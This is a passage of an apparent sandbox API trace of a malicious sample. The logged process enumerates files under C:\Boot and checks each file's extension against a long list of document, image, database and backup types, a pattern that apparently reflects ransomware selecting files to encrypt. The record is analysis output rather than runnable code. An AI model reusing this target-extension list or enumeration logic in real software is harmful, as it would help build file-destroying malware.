ftLastAccessTime.dwLowDateTime=0xef96ef3e, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0285.794] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c0da69, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef97d9ab, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x14f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0285.794] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef98c419, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x150a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0285.795] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0285.795] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0285.795] FindClose (in: hFindFile=0x3948328 | out: hFindFile=0x3948328) returned 1 [0285.796] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0285.796] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0285.796] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0285.796] lstrlenW (lpString="C:\\Boot\\fr-CA") returned 13 [0285.796] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-CA\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0285.797] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.797] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.797] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.797] lstrlenW (lpString=".1cd") returned 4 [0285.797] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.797] lstrlenW (lpString=".3ds") returned 4 [0285.797] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0285.797] lstrlenW (lpString=".3fr") returned 4 [0285.797] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0285.797] lstrlenW (lpString=".3g2") returned 4 [0285.797] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0285.797] lstrlenW (lpString=".3gp") returned 4 [0285.797] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0285.797] lstrlenW (lpString=".7z") returned 3 [0285.797] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.797] lstrlenW (lpString=".accda") returned 6 [0285.797] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0285.797] lstrlenW (lpString=".accdb") returned 6 [0285.797] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0285.798] lstrlenW (lpString=".accdc") returned 6 [0285.798] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0285.798] lstrlenW (lpString=".accde") returned 6 [0285.798] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0285.798] lstrlenW (lpString=".accdt") returned 6 [0285.798] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0285.798] lstrlenW (lpString=".accdw") returned 6 [0285.798] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0285.798] lstrlenW (lpString=".adb") returned 4 [0285.798] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0285.798] lstrlenW (lpString=".adp") returned 4 [0285.798] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0285.798] lstrlenW (lpString=".ai") returned 3 [0285.798] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0285.798] lstrlenW (lpString=".ai3") returned 4 [0285.798] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0285.798] lstrlenW (lpString=".ai4") returned 4 [0285.798] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0285.798] lstrlenW (lpString=".ai5") returned 4 [0285.798] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0285.798] lstrlenW (lpString=".ai6") returned 4 [0285.798] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0285.798] lstrlenW (lpString=".ai7") returned 4 [0285.798] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0285.798] lstrlenW (lpString=".ai8") returned 4 [0285.798] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0285.799] lstrlenW (lpString=".anim") returned 5 [0285.799] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0285.799] lstrlenW (lpString=".arw") returned 4 [0285.799] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0285.799] lstrlenW (lpString=".as") returned 3 [0285.799] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0285.799] lstrlenW (lpString=".asa") returned 4 [0285.799] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0285.799] lstrlenW (lpString=".asc") returned 4 [0285.799] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0285.799] lstrlenW (lpString=".ascx") returned 5 [0285.799] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0285.799] lstrlenW (lpString=".asm") returned 4 [0285.799] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0285.799] lstrlenW (lpString=".asmx") returned 5 [0285.799] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0285.799] lstrlenW (lpString=".asp") returned 4 [0285.799] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0285.799] lstrlenW (lpString=".aspx") returned 5 [0285.799] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0285.799] lstrlenW (lpString=".asr") returned 4 [0285.799] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0285.799] lstrlenW (lpString=".asx") returned 4 [0285.799] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0285.799] lstrlenW (lpString=".avi") returned 4 [0285.799] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0285.800] lstrlenW (lpString=".avs") returned 4 [0285.800] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0285.800] lstrlenW (lpString=".backup") returned 7 [0285.800] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0285.800] lstrlenW (lpString=".bak") returned 4 [0285.800] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0285.800] lstrlenW (lpString=".bay") returned 4 [0285.800] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0285.800] lstrlenW (lpString=".bd") returned 3 [0285.800] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0285.800] lstrlenW (lpString=".bin") returned 4 [0285.800] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0285.800] lstrlenW (lpString=".bmp") returned 4 [0285.800] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0285.800] lstrlenW (lpString=".bz2") returned 4 [0285.800] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.800] lstrlenW (lpString=".c") returned 2 [0285.800] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0285.800] lstrlenW (lpString=".cdr") returned 4 [0285.800] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0285.800] lstrlenW (lpString=".cer") returned 4 [0285.801] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0285.801] lstrlenW (lpString=".cf") returned 3 [0285.801] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0285.801] lstrlenW (lpString=".cfc") returned 4 [0285.801] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0285.801] lstrlenW (lpString=".cfm") returned 4 [0285.801] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0285.801] lstrlenW (lpString=".cfml") returned 5 [0285.801] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0285.801] lstrlenW (lpString=".cfu") returned 4 [0285.801] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0285.801] lstrlenW (lpString=".chm") returned 4 [0285.801] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0285.801] lstrlenW (lpString=".cin") returned 4 [0285.801] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0285.801] lstrlenW (lpString=".class") returned 6 [0285.801] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0285.801] lstrlenW (lpString=".clx") returned 4 [0285.801] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0285.801] lstrlenW (lpString=".config") returned 7 [0285.801] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0285.801] lstrlenW (lpString=".cpp") returned 4 [0285.801] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0285.801] lstrlenW (lpString=".cr2") returned 4 [0285.801] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0285.801] lstrlenW (lpString=".crt") returned 4 [0285.801] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".crw") returned 4 [0285.802] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".cs") returned 3 [0285.802] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0285.802] lstrlenW (lpString=".css") returned 4 [0285.802] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".csv") returned 4 [0285.802] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".cub") returned 4 [0285.802] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".dae") returned 4 [0285.802] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".dat") returned 4 [0285.802] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".db") returned 3 [0285.802] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0285.802] lstrlenW (lpString=".dbf") returned 4 [0285.802] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".dbx") returned 4 [0285.802] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".dc3") returned 4 [0285.802] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".dcm") returned 4 [0285.802] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".dcr") returned 4 [0285.802] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0285.802] lstrlenW (lpString=".der") returned 4 [0285.803] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0285.803] lstrlenW (lpString=".dib") returned 4 [0285.803] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0285.803] lstrlenW (lpString=".dic") returned 4 [0285.803] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0285.803] lstrlenW (lpString=".dif") returned 4 [0285.803] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0285.803] lstrlenW (lpString=".divx") returned 5 [0285.803] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0285.803] lstrlenW (lpString=".djvu") returned 5 [0285.803] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0285.803] lstrlenW (lpString=".dng") returned 4 [0285.803] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0285.803] lstrlenW (lpString=".doc") returned 4 [0285.803] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.803] lstrlenW (lpString=".docm") returned 5 [0285.803] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0285.803] lstrlenW (lpString=".docx") returned 5 [0285.803] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.803] lstrlenW (lpString=".dot") returned 4 [0285.803] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0285.803] lstrlenW (lpString=".dotm") returned 5 [0285.803] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0285.804] lstrlenW (lpString=".dotx") returned 5 [0285.804] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0285.804] lstrlenW (lpString=".dpx") returned 4 [0285.804] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0285.804] lstrlenW (lpString=".dqy") returned 4 [0285.804] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0285.804] lstrlenW (lpString=".dsn") returned 4 [0285.804] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0285.804] lstrlenW (lpString=".dt") returned 3 [0285.804] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0285.804] lstrlenW (lpString=".dtd") returned 4 [0285.804] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0285.804] lstrlenW (lpString=".dwg") returned 4 [0285.804] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0285.804] lstrlenW (lpString=".dwt") returned 4 [0285.804] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0285.804] lstrlenW (lpString=".dx") returned 3 [0285.804] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0285.804] lstrlenW (lpString=".dxf") returned 4 [0285.804] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0285.804] lstrlenW (lpString=".edml") returned 5 [0285.804] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0285.804] lstrlenW (lpString=".efd") returned 4 [0285.804] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0285.804] lstrlenW (lpString=".elf") returned 4 [0285.804] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0285.804] lstrlenW (lpString=".emf") returned 4 [0285.804] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".emz") returned 4 [0285.805] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".epf") returned 4 [0285.805] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".eps") returned 4 [0285.805] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".epsf") returned 5 [0285.805] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0285.805] lstrlenW (lpString=".epsp") returned 5 [0285.805] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0285.805] lstrlenW (lpString=".erf") returned 4 [0285.805] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".exr") returned 4 [0285.805] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".f4v") returned 4 [0285.805] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".fido") returned 5 [0285.805] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0285.805] lstrlenW (lpString=".flm") returned 4 [0285.805] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".flv") returned 4 [0285.805] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".frm") returned 4 [0285.805] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".fxg") returned 4 [0285.805] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.805] lstrlenW (lpString=".geo") returned 4 [0285.806] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.806] lstrlenW (lpString=".gif") returned 4 [0285.806] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.806] lstrlenW (lpString=".grs") returned 4 [0285.806] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.806] lstrlenW (lpString=".gz") returned 3 [0285.806] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.806] lstrlenW (lpString=".h") returned 2 [0285.806] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.806] lstrlenW (lpString=".hdr") returned 4 [0285.806] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.806] lstrlenW (lpString=".hpp") returned 4 [0285.806] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.806] lstrlenW (lpString=".hta") returned 4 [0285.806] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.806] lstrlenW (lpString=".htc") returned 4 [0285.806] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.806] lstrlenW (lpString=".htm") returned 4 [0285.806] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.806] lstrlenW (lpString=".html") returned 5 [0285.806] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0285.806] lstrlenW (lpString=".icb") returned 4 [0285.806] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.806] lstrlenW (lpString=".ics") returned 4 [0285.806] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".iff") returned 4 [0285.807] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".inc") returned 4 [0285.807] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".indd") returned 5 [0285.807] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0285.807] lstrlenW (lpString=".ini") returned 4 [0285.807] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".iqy") returned 4 [0285.807] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".j2c") returned 4 [0285.807] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".j2k") returned 4 [0285.807] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".java") returned 5 [0285.807] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0285.807] lstrlenW (lpString=".jp2") returned 4 [0285.807] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".jpc") returned 4 [0285.807] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".jpe") returned 4 [0285.807] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".jpeg") returned 5 [0285.807] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0285.807] lstrlenW (lpString=".jpf") returned 4 [0285.807] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.807] lstrlenW (lpString=".jpg") returned 4 [0285.808] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".jpx") returned 4 [0285.808] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".js") returned 3 [0285.808] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.808] lstrlenW (lpString=".jsf") returned 4 [0285.808] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".json") returned 5 [0285.808] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0285.808] lstrlenW (lpString=".jsp") returned 4 [0285.808] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".kdc") returned 4 [0285.808] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".kmz") returned 4 [0285.808] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".kwm") returned 4 [0285.808] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".lasso") returned 6 [0285.808] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0285.808] lstrlenW (lpString=".lbi") returned 4 [0285.808] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".lgf") returned 4 [0285.808] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".lgp") returned 4 [0285.808] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0285.808] lstrlenW (lpString=".log") returned 4 [0285.809] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".m1v") returned 4 [0285.809] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".m4a") returned 4 [0285.809] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".m4v") returned 4 [0285.809] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".max") returned 4 [0285.809] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".md") returned 3 [0285.809] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.809] lstrlenW (lpString=".mda") returned 4 [0285.809] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".mdb") returned 4 [0285.809] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".mde") returned 4 [0285.809] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".mdf") returned 4 [0285.809] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".mdw") returned 4 [0285.809] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".mef") returned 4 [0285.809] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.809] lstrlenW (lpString=".mft") returned 4 [0285.809] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mfw") returned 4 [0285.810] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mht") returned 4 [0285.810] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mhtml") returned 6 [0285.810] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0285.810] lstrlenW (lpString=".mka") returned 4 [0285.810] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mkidx") returned 6 [0285.810] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0285.810] lstrlenW (lpString=".mkv") returned 4 [0285.810] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mos") returned 4 [0285.810] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mov") returned 4 [0285.810] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mp3") returned 4 [0285.810] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mp4") returned 4 [0285.810] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mpeg") returned 5 [0285.810] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0285.810] lstrlenW (lpString=".mpg") returned 4 [0285.810] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mpv") returned 4 [0285.810] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0285.810] lstrlenW (lpString=".mrw") returned 4 [0285.811] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0285.811] lstrlenW (lpString=".msg") returned 4 [0285.811] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0285.811] lstrlenW (lpString=".mxl") returned 4 [0285.811] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".myd") returned 4 [0285.811] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".myi") returned 4 [0285.811] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".nef") returned 4 [0285.811] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".nrw") returned 4 [0285.811] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".obj") returned 4 [0285.811] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".odb") returned 4 [0285.811] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0285.811] lstrlenW 